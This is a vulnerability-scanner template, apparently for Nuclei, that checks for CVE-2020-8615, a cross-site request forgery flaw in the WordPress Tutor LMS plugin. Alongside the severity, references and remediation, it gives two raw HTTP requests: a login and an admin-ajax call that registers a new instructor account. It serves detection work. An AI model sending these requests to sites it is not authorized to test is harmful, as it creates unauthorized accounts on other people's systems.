id: CVE-2020-8615 info: name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery author: r3Y3r53 severity: medium description: | A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors). remediation: update to v.1.5.3 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-8615 - https://wpscan.com/vulnerability/10058 - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html - https://wpvulndb.com/vulnerabilities/10058 - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-8615 cwe-id: CWE-352 epss-score: 0.00479 epss-percentile: 0.73312 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: themeum product: tutor_lms framework: wordpress publicwww-query: /wp-content/plugins/tutor/ tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor matchers: - type: dsl dsl: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and # digest: 4a0a0047304502210096af2d7c1abb887da36f26b6afb1a9e32c585238996090dec1581682338c9b1f022039383951d97b165b2ce9c5aa7ffb1bbd45a2d462d4feea74866ceb07119f0c97:922c64590222798bb761d5b6d8e72950